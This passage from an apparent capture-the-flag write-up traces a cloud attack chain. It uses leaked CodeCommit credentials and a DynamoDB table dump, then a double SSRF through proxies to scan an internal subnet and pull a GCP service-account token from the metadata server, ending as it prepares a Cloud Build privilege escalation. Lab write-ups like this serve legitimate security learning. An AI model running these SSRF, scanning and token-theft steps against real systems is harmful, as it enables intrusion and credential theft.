ec2.DescribeRouteTables
ec2.DescribeVpnConnections
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
opsworks.DescribeStacks
route53.ListGeoLocations
s3.ListBuckets
sts.GetCallerIdentity

We can see a few interesting permitted actions, namely:

  • codecommit.ListRepositories relating to git repositories
  • dynamodb.ListTables relating to NoSQL databases
  • ec2.DescribeRouteTables relating to network routing tables of the Virtual Private Cloud (VPC)
  • ec2.DescribeVpnConnections relating to VPN tunnels
  • s3.ListBuckets relating to S3 buckets

Since we started the challenge from a note residing in an Amazon S3 bucket, let’s proceed to enumerate that first.

Getting git Credentials

First, we try to list all S3 buckets:

$ aws s3 ls
2020-11-21 18:36:15 punggol-digital-lock-portal

Seems like there’s only one bucket. Let’s list the objects in the S3 bucket:

$ aws s3 ls s3://punggol-digital-lock-portal/
2020-11-21 19:22:44       2513 index.html
2020-11-21 19:22:44        253 notes-to-covid-developers.txt
2020-11-21 20:37:57        274 some-credentials-for-you-lazy-bums.txt

There is a hidden file some-credentials-for-you-lazy-bums.txt in the punggol-digital-lock-portal S3 bucket!
Let’s fetch the hidden file:

$ aws s3 cp s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt .
download: s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt to ./some-credentials-for-you-lazy-bums.txt

The file some-credentials-for-you-lazy-bums.txt contains the following content:

covid-developer-at-843869678166
TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=

Use these credentials that I have provisioned for you! The other internal web application is still under development.
The other network engineers are busy getting our networks connected.

Great! We obtained git credentials successfully. I wonder where we can use them… :thinking:

git Those Repositories

That’s right! We can use it to access git repositories hosted on AWS CodeCommit source control service.

Let’s first list all AWS CodeCommit repositories:

$ aws codecommit list-repositories
{
    "repositories": [
        {
            "repositoryName": "punggol-digital-lock-api",
            "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105"
        },
        {
            "repositoryName": "punggol-digital-lock-cors-server",
            "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e"
        }
    ]
}

Two code repositories are found. Let’s get more details of the respective repositories:

$ aws codecommit get-repository --repository-name punggol-digital-lock-api
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105",
        "repositoryName": "punggol-digital-lock-api",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985979.053,
        "creationDate": 1605985614.824,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-api"
    }
}

$ aws codecommit get-repository --repository-name punggol-digital-lock-cors-server
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e",
        "repositoryName": "punggol-digital-lock-cors-server",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985991.35,
        "creationDate": 1605985592.865,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-cors-server"
    }
}

Grab the two git clone URLs and fetch the two code repositories:

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server
Cloning into 'punggol-digital-lock-cors-server'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
Password for 'https://covid-developer-at-843869678166@git-codecommit.ap-southeast-1.amazonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 8, done.
Unpacking objects: 100% (8/8), done.

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api
Cloning into 'punggol-digital-lock-api'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
Password for 'https://covid-developer-at-843869678166@git-codecommit.ap-southeast-1.amazonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 7, done.
Unpacking objects: 100% (7/7), done.

Awesome! We now have both code repositories.

At this point, the punggol-digital-lock-api repository sounds more interesting, since punggol-digital-lock-cors-server is likely just the cors-anywhere proxy application, so let’s look at punggol-digital-lock-api first.

Getting to the Database

In the punggol-digital-lock-api repository, there is a Node.js application.

The source code of index.js is shown below:

var express = require('express')
var app = express()
var cors = require('cors');
var AWS = require("aws-sdk");
var corsOptions = {
    origin: 'http://punggol-digital-lock.internal',
    optionsSuccessStatus: 200 // some legacy browsers (IE11, various SmartTVs) choke on 204
}
AWS.config.loadFromPath('./node_config.json');
var ddb = new AWS.DynamoDB({ apiVersion: '2012-08-10' });
let dataStore = [];

const download_data = () => {
    return new Promise((resolve, reject) => {
        try {
            var params = {
                ExpressionAttributeValues: {
                    ':id': { N: '101' }
                },
                FilterExpression: 'id < :id',
                TableName: 'citizens'
            };
            ddb.scan(params, function (err, data) {
                if (err) {
                    console.log("Error", err);
                    return reject(null);
                } else {
                    results = []
                    data.Items.forEach(function (element, index, array) {
                        results.push({
                            'no_of_files': element.no_of_files.N,
                            'cash_bounty': element.cash_bounty.N,
                            'id': element.id.N,
                            'name': element.name.S,
                            'total_file_size': element.total_file_size.N
                        });
                    });
                    return resolve(results);
                }
            });
        } catch (err) {
            console.error(err);
        }
    });

}

async function boostrap() {
    dataStore = await download_data();
}

boostrap();

app.get('/dump-data', cors(corsOptions), function (req, res, next) {
    res.json({ data: dataStore });
})
app.listen(8080, function () {
    console.log('punggol-digital-lock-api server running on port 8080')
})

We can observe that there is an internal hostname punggol-digital-lock.internal and that the application fetches the list of victim users from an Amazon DynamoDB NoSQL database. Taking a closer look at the code, we can also see that the table name is citizens and that the code executes ddb.scan() to fetch records with id < 101.
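
As an aside, the scan that the application performs can be reproduced directly with boto3 using the temporary credentials obtained earlier. Here is a minimal sketch (the table name, region, and filter expression are taken from the code above; pagination is ignored for brevity):

# Minimal boto3 sketch reproducing the scan performed by index.js.
# Assumes the temporary credentials obtained earlier are configured
# (e.g. via ~/.aws/credentials or environment variables).
import boto3

ddb = boto3.client("dynamodb", region_name="ap-southeast-1")

# Same filter as the application: only items with id < 101
resp = ddb.scan(
    TableName="citizens",
    FilterExpression="id < :id",
    ExpressionAttributeValues={":id": {"N": "101"}},
)

for item in resp["Items"]:
    print(item["id"]["N"], item["name"]["S"])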

Scanning the Flag from DynamoDB

Let’s try to enumerate the Amazon DynamoDB NoSQL database further.

$ aws dynamodb list-tables
{
    "TableNames": [
        "citizens"
    ]
}

Looks like there’s only one table citizens in the DynamoDB. Let’s try to query it and fetch all records except id = 0:

$ aws dynamodb query --table-name "citizens" --key-condition-expression 'id > :id' --expression-attribute-values '{":id":{"N":"0"}}'

An error occurred (AccessDeniedException) when calling the Query operation: User: arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e is not authorized to perform: dynamodb:Query on resource: arn:aws:dynamodb:ap-southeast-1:843869678166:table/citizens

Unfortunately, we don’t have the permission to do so. Instead of performing the query operation, let’s try using the scan operation to dump the table contents instead:

$ aws dynamodb scan --table-name citizens | wc -l
1724

That worked! That’s quite a bit of data to sieve through, so let’s grep for the flag in the JSON output:

$ aws dynamodb scan --table-name citizens | grep -A 5 -B 11 govtech
{
    "no_of_files": {
        "N": "0"
    },
    "cash_bounty": {
        "N": "0"
    },
    "id": {
        "N": "10000"
    },
    "name": {
        "S": "govtech-csg{Mult1_Cl0uD_"
    },
    "total_file_size": {
        "N": "0"
    }
},

And we successfully get the first half of the flag: govtech-csg{Mult1_Cl0uD_ :smile:
Before we continue to find the second half of the flag, let’s take a quick look at our progress at the moment:

Midpoint of Attack Path

VPN Subnet Routing

Now what? We still have not looked at the punggol-digital-lock-cors-server code repository yet.

As expected, there is a Node.js application that simply spins up a cors-anywhere proxy in index.js:

// Listen on a specific host via the HOST environment variable
var host = '0.0.0.0';
// Listen on a specific port via the PORT environment variable
var port = 80;
var cors_proxy = require('cors-anywhere');
cors_proxy.createServer({
    originWhitelist: [], // Allow all origins
    setHeaders: {'x-requested-with': 'cors-server'},
    removeHeaders: ['cookie']
}).listen(port, host, function() {
    console.log('cors-server running on ' + host + ':' + port);
});

More importantly, there’s a note.txt:

Allow requests to be proxied to reach internal networks. Current network has routing enabled to the other VPN subnets.

That’s interesting. If the current network has routing to the other VPN subnets, perhaps we can access hosts on the other network too!
Which reminds me, we haven’t checked out the output for the permitted actions – ec2.DescribeRouteTables and ec2.DescribeVpnConnections – just yet, so let’s do that now:

$ aws ec2 describe-vpn-connections
{
    "VpnConnections": [
        {
            "CustomerGatewayConfiguration": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<vpn_connection id=\"vpn-071d320b1122f4c0e\">\n  <customer_gateway_id>cgw-025dc69154fd5cf91</customer_gateway_id>\n  <vpn_gateway_id>vgw-03a9749df3e682e4b</vpn_gateway_id>\n  <vpn_connection_type>ipsec.1</vpn_connection_type>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.118</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.23.247</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.117</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>lROuGqp0zYsQ5PjyJNHlKTFQPz0apIn4</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      <authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.238</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.251.166</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.237</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>.BFZUutUl7Y3jA91vU9K6te5y_Q_VM7f</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      
<authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n</vpn_connection>",
            "CustomerGatewayId": "cgw-025dc69154fd5cf91",
            "Category": "VPN",
            "State": "available",
            "Type": "ipsec.1",
            "VpnConnectionId": "vpn-071d320b1122f4c0e",
            "VpnGatewayId": "vgw-03a9749df3e682e4b",
            "Options": {
                "EnableAcceleration": false,
                "StaticRoutesOnly": false,
                "LocalIpv4NetworkCidr": "0.0.0.0/0",
                "RemoteIpv4NetworkCidr": "0.0.0.0/0",
                "TunnelInsideIpVersion": "ipv4"
            },
            "Routes": [],
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "aws-vpn-connection1"
                }
            ],
            "VgwTelemetry": [
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T13:21:11.000Z",
                    "OutsideIpAddress": "54.254.23.247",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                },
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T16:20:56.000Z",
                    "OutsideIpAddress": "54.254.251.166",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                }
            ]
        }
    ]
}

Whoa! That’s a lot of information.

Essentially, the Amazon EC2 instance has a site-to-site IPsec VPN tunnel between 54.254.23.247 (Amazon) and 34.87.151.253 (Google Cloud). This creates a persistent connection between the two Virtual Private Cloud (VPC) networks, allowing access to network resources in the Google Cloud VPC network from the Amazon VPC network and vice versa.

Let’s also view the network routes configured for the Amazon VPC:

$ aws ec2 describe-route-tables
{
    "RouteTables": [
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-f9acc780",
                    "RouteTableId": "rtb-f8d8a19e",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [],
            "RouteTableId": "rtb-f8d8a19e",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.31.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-e15b4f85",
                    "Origin": "CreateRoute",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-66699c00",
            "OwnerId": "843869678166"
        },
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-04c8bf104c051f5a3",
                    "RouteTableId": "rtb-0723142a5801fe538",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [
                {
                    "GatewayId": "vgw-03a9749df3e682e4b"
                }
            ],
            "RouteTableId": "rtb-0723142a5801fe538",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.16.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-0ce84b9afa6a16a08",
                    "Origin": "CreateRoute",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "10.240.0.0/24",
                    "GatewayId": "vgw-03a9749df3e682e4b",
                    "Origin": "EnableVgwRoutePropagation",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-09e10b8144ebddec2",
            "OwnerId": "843869678166"
        }
    ]
}

Notice that traffic destined for the 10.240.0.0/24 subnet is routed via the gateway vgw-03a9749df3e682e4b, which is also the VpnGatewayId found in the VPN connection details. Since the two networks are connected by the VPN tunnel, we can try to reach hosts in the peer network.

To do so, we can leverage the SSRF in the punggol-digital-lock-cors-server application and brute-force against the 10.240.0.0/24 subnet to identify hosts that are alive on the network.

Note: Valid host addresses in 10.240.0.0/24 range from 10.240.0.1 to 10.240.0.254, so we only need to brute-force 254 hosts.

If a network host is unreachable via SSRF, the response will be extremely delayed. Hence, we can set a timeout of 1 second when performing our brute-force to reduce the scanning time needed.
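
Conceptually, the brute-force boils down to something like the following Python sketch (the proxy address and subnet are taken from the steps above, and the 1-second timeout follows the reasoning just mentioned):

# Rough sketch of the /24 host discovery through the cors-anywhere proxy.
# Unreachable hosts hang until the proxy gives up, so a short timeout
# keeps the scan fast; timeouts and connection errors mean "not alive".
import requests

PROXY = "http://122.248.230.66"   # cors-anywhere instance from the challenge

for last_octet in range(1, 255):
    target = f"10.240.0.{last_octet}"
    try:
        r = requests.get(f"{PROXY}/http://{target}/", timeout=1)
        if r.status_code == 200:
            print(f"[+] {target} is alive ({len(r.content)} bytes)")
    except requests.exceptions.RequestException:
        pass  # timeout or connection error -> treat host as unreachable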

I used ffuf to fuzz the last octet of the IP address:

$ seq 1 254 > octet
$ ffuf -u http://122.248.230.66/http://10.240.0.FUZZ/ -w octet -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.FUZZ/
 :: Wordlist         : FUZZ: octet
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

100                     [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [254/254] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:14] :: Errors: 253 ::

We found an alive network host 10.240.0.100!

Now, we can also enumerate all TCP ports and try to discover any HTTP/HTTPS services that we can interact with:

$ seq 1 65535 > ports
$ ffuf -u http://122.248.230.66/http://10.240.0.100:FUZZ/ -w ports -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.100:FUZZ/
 :: Wordlist         : FUZZ: ports
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

80                      [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [65535/65535] :: Job [1/1] :: 5041 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

Doh! There’s a HTTP webserver running on port 80 on the host all along!

Exploiting SSRF-as-a-Service (“SaaS”) Application

Internal Web Proxy

Great! We discovered yet another proxy application.

Even if we had not realised earlier that this network host is actually within a Google VPC, we would figure that out pretty quickly in this next step.

Using the proxy, let’s enter http://localhost as the site and see if the response returns the Internal Web Proxy itself:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    Failed to parse address "localhost" (error number 0) 
    </body>
</html>

Seems like there’s some parsing errors in the URL supplied. Maybe it requires a port number to be explicitly specified?

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    <br><hr><br>HTTP/1.1 400 Bad Request
Date: Thu, 10 Dec 2020 05:53:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 366
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at gcp-vm-asia-southeast1.asia-southeast1-a.c.stack-the-flags-296309.internal Port 80</address>
</body></html>
    </body>
</html>

Interestingly, we got a 400 Bad Request error, leaking the internal hostname of an instance hosted on GCP Compute Engine (inferred from the gcp-* hostname). If we fix the request by adding a trailing slash to the URL, i.e. http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80/, we can use the Internal Web Proxy application to fetch itself:

Internal Web Proxy

Now, we have a working SSRF within the Google VPC network assigned to the GCP Compute Engine instance! :smile:
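
Since every request now goes through two hops (cors-anywhere on the AWS side, then the Internal Web Proxy on the GCP side), a small helper to build the chained URL keeps the rest of the enumeration readable. A sketch, assuming both proxies keep behaving as observed above:

# Helper for the two-hop SSRF chain:
#   us -> cors-anywhere (122.248.230.66) -> Internal Web Proxy (10.240.0.100) -> target
import requests

CORS_PROXY = "http://122.248.230.66"
INTERNAL_PROXY = "http://10.240.0.100/index.php?site="

def ssrf(target_url, timeout=10):
    """Fetch target_url from inside the GCP VPC via both proxies."""
    url = f"{CORS_PROXY}/{INTERNAL_PROXY}{target_url}"
    return requests.get(url, timeout=timeout).text

# Example: fetch the Internal Web Proxy's own landing page, as above.
print(ssrf("http://localhost:80/"))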

Can you smell the flag yet? We are so close to the flag now…
Let’s pause for a minute to see where we are at now:
Attack Path Reaching GCP

Metadata FTW

What’s next? Well, we can enumerate the GCP instance metadata server to get temporary service account credentials.

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/
...
HTTP/1.1 200 OK
Metadata-Flavor: Google
Content-Type: application/text
ETag: 2f6048afc5ce2feb
Date: Thu, 10 Dec 2020 06:16:09 GMT
Server: Metadata Server for VM
Connection: Close
Content-Length: 183
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

attributes/
description
disks/
guest-attributes/
hostname
id
image
licenses/
machine-type
maintenance-event
name
network-interfaces/
preempted
scheduling/
service-accounts/
tags
zone

We see that the deprecated v1beta1 metadata endpoint is still enabled, which is great news for us because we don’t have to set the Metadata-Flavor: Google HTTP header in our requests. There doesn’t appear to be a way to make the Internal Web Proxy application set a custom HTTP header for us, so we won’t be able to fetch metadata from the v1 metadata endpoint via SSRF:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1/
...
HTTP/1.1 403 Forbidden
Metadata-Flavor: Google
Date: Thu, 10 Dec 2020 06:40:48 GMT
Content-Type: text/html; charset=UTF-8
Server: Metadata Server for VM
Connection: Close
Content-Length: 1636
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
...
$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/
...
covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/
default/
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/aliases
...
default
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/scopes
...
https://www.googleapis.com/auth/cloud-platform
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/token
...
{"access_token":"ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU","expires_in":3395,"token_type":"Bearer"}
...

Here, we can see a service account covid-devops@stack-the-flags-296309.iam.gserviceaccount.com assumes the covid-devops role. The scope of the service account is cloud-platform, which looks really promising. Lastly, we also managed to fetch the OAuth token associated with the service account, allowing us to authenticate and perform actions on behalf of the service account.

We will probably also need the project ID so let’s grab that from the metadata server:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/project/project-id
...

stack-the-flags-296309
...

Enumerating Google Cloud APIs

Looking at the list of Google Cloud APIs, we see that there are many available for us to use. Note that not all APIs are enabled or accessible to the service account, so we should start by figuring out what is accessible to us.

Using the GCP’s Identity and Access Management (IAM) API, let’s try to list all roles in the stack-the-flags-296309 project:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "roles": [
    {
      "name": "projects/stack-the-flags-296309/roles/covid_devops",
      "title": "covid-devops",
      "description": "Created on: 2020-11-22",
      "etag": "BwW0oxMMCDU="
    }
  ]
}

That worked! Seems like there’s only the covid_devops role. Let’s try to view the permissions included for the role:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/covid_devops?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "name": "projects/stack-the-flags-296309/roles/covid_devops",
  "title": "covid-devops",
  "description": "Created on: 2020-11-22",
  "includedPermissions": [
    "cloudbuild.builds.create",
    "compute.instances.get",
    "compute.projects.get",
    "iam.roles.get",
    "iam.roles.list",
    "storage.buckets.create",
    "storage.buckets.get",
    "storage.buckets.list",
    "storage.objects.create"
  ],
  "etag": "BwW0oxMMCDU="
}

We observe a few interesting permissions for the covid_devops role. Since we are looking for the flag, perhaps the flag is stored as an object in a GCP Cloud Storage bucket. However, note that we only have the following permissions relating to GCP Cloud Storage:

  • storage.buckets.create
  • storage.buckets.get
  • storage.buckets.list
  • storage.objects.create

Without the storage.objects.get permission, we may be unable to read objects stored in the bucket. Nonetheless, let’s proceed to enumerate the list of buckets using GCP’s Cloud Storage API:

$ curl "https://storage.googleapis.com/storage/v1/b?project=stack-the-flags-296309&access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU"
{
  "kind": "storage#buckets",
  "items": [
    {
      "kind": "storage#bucket",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key",
      "id": "punggol-digital-lock-key",
      "name": "punggol-digital-lock-key",
      "projectNumber": "605021491171",
      "metageneration": "3",
      "location": "ASIA-SOUTHEAST1",
      "storageClass": "STANDARD",
      "etag": "CAM=",
      "defaultEventBasedHold": false,
      "timeCreated": "2020-11-21T20:14:44.705Z",
      "updated": "2020-11-22T07:53:37.521Z",
      "iamConfiguration": {
        "bucketPolicyOnly": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        },
        "uniformBucketLevelAccess": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        }
      },
      "locationType": "region",
      "satisfiesPZS": false
    }
  ]
}

We see that there’s a bucket named punggol-digital-lock-key. Perhaps we need to escalate our privileges to another user with storage.objects.get permissions. Reviewing the privileges of the covid_devops role, we see that there is cloudbuild.builds.create IAM permission.

Road to Impersonating the Cloud Build Service Account

Rhino Security Labs wrote an article on a privilege escalation attack using the cloudbuild.builds.create permission, allowing us to obtain temporary credentials for GCP’s Cloud Build service account, which may have greater privileges than our current covid-devops service account.

Rhino Security Labs also created a public GitHub repository for IAM Privilege Escalation in GCP containing the exploit script for escalating privileges via cloudbuild.builds.create permission.

Before we continue, do install the googleapiclient dependency using:

$ pip3 install google-api-python-client --user
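
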